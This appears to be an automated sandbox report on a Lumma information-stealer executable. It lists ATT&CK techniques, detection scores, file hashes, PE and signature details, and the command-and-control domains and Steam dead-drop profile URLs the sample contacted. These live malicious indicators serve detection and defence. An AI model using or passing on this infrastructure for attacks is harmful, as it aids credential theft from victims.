Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
A6QFRW2WiY.exe	68%	ReversingLabs	Win32.Spyware.Lummastealer

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	unknown
sergei-esenin.com	172.67.206.204	true	true	unknown
fragnantbui.shop	unknown	unknown	true	unknown
gutterydhowi.shop	unknown	unknown	true	unknown
offensivedzvju.shop	unknown	unknown	true	unknown
stogeneratmns.shop	unknown	unknown	true	unknown
reinforcenh.shop	unknown	unknown	true	unknown
drawzhotdog.shop	unknown	unknown	true	unknown
ghostreedmnu.shop	unknown	unknown	true	unknown
vozmeatillu.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true		unknown
reinforcenh.shop	true		unknown
ghostreedmnu.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true		unknown
gutterydhowi.shop	true		unknown
offensivedzvju.shop	true		unknown
drawzhotdog.shop	true		unknown
https://sergei-esenin.com/api	true		unknown
vozmeatillu.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
https://sergei-esenin.com/	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drawzhotdog.shop/api-	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/apiD	RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reinforcenh.shop/api	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/ts1ca.crl0	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/m	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
https://vozmeatillu.shop/api	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ghostreedmnu.shop/api	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/api	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	A6QFRW2WiY.exe	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
172.67.206.204	sergei-esenin.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1527259
Start date and time:	2024-10-06 22:09:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	A6QFRW2WiY.exe renamed because original name is a hash value
Original Sample Name:	0cee1d66332dec523210f62e479284b9.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/2@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 12 Number of non-executed functions: 88
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: A6QFRW2WiY.exe

Simulations

Behavior and APIs

Time	Type	Description
16:10:15	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
172.67.206.204	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	http://app.easygoogleanalytics4.com	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	172.67.206.204
	Launch.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.206.204
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	104.102.49.254
	msvcp110.dll	Get hash	malicious	LummaC	Browse	104.102.49.254
	Launch.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://revexhibition.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://revsolsavenue.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/656749019228815	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	http://rajdeep-006.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://barik-ankita.github.io/Netflix-clone	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	http://kashishoza.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	162.159.140.229
	http://codeeezzz.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://shreyascyber.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/581207279857749	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	http://directcoverbet.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.44.139
AKAMAI-ASUS	na.elf	Get hash	malicious	Mirai	Browse	104.119.246.31
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	na.elf	Get hash	malicious	Mirai	Browse	184.29.182.72
	https://store.dewaffled.ru.net/	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://steamcommynutiy.com/glft/8412	Get hash	malicious	Unknown	Browse	88.221.169.65
	http://ipfs.io/ipfs/bafybeidgkzr2gy7npe4yonk6p7s4chmwvgd2cp7bk7u6llfwiutgvt77tq	Get hash	malicious	HTMLPhisher	Browse	88.221.168.23
	na.elf	Get hash	malicious	Mirai	Browse	95.101.248.33
	na.elf	Get hash	malicious	Mirai	Browse	95.101.173.128
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	http://directcoverbet.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	wu5C20dPdy.exe	Get hash	malicious	SmokeLoader	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	https://lynwoodgrove.com/Comerica/file/prohqcker1.php	Get hash	malicious	Unknown	Browse	104.102.49.254 172.67.206.204
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	104.102.49.254 172.67.206.204
	msvcp110.dll	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	Launch.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204

Process:	C:\Users\user\Desktop\A6QFRW2WiY.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\A6QFRW2WiY.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.988522009011023
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	A6QFRW2WiY.exe
File size:	377'384 bytes
MD5:	0cee1d66332dec523210f62e479284b9
SHA1:	33f950916e13a6ec654c52160ee47e88c64a5724
SHA256:	0a6a258bfdb9b1947f2945b44e274ff3f06a7c5c733ff83c2a71c5f911fa9cc0
SHA512:	603aa4834c6d3a9f3b6b1629eeb2108cecfd7192110f0cf948f2971957a9231ad9d405d8424e3a41b32a8ff415d8f84e55afdec38bf996703093084162d11972
SSDEEP:	6144:uXfqISDaHCXsYQkiJ0j0Zt/d/WCIRibFrzae5LpVGbM/5Pg+rq8ZrPbXbCEO:uCvXsWtI/dVHbdastVG2ycWEO
TLSH:	70842325C5E0410AC18A0AB8AD59507FFF78F79F2BB284AD8439DC391B9673C6D8197C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v#.f................................. ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45b0ee
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F42376 [Wed Sep 25 14:51:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b094	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x59c00	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5af5c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
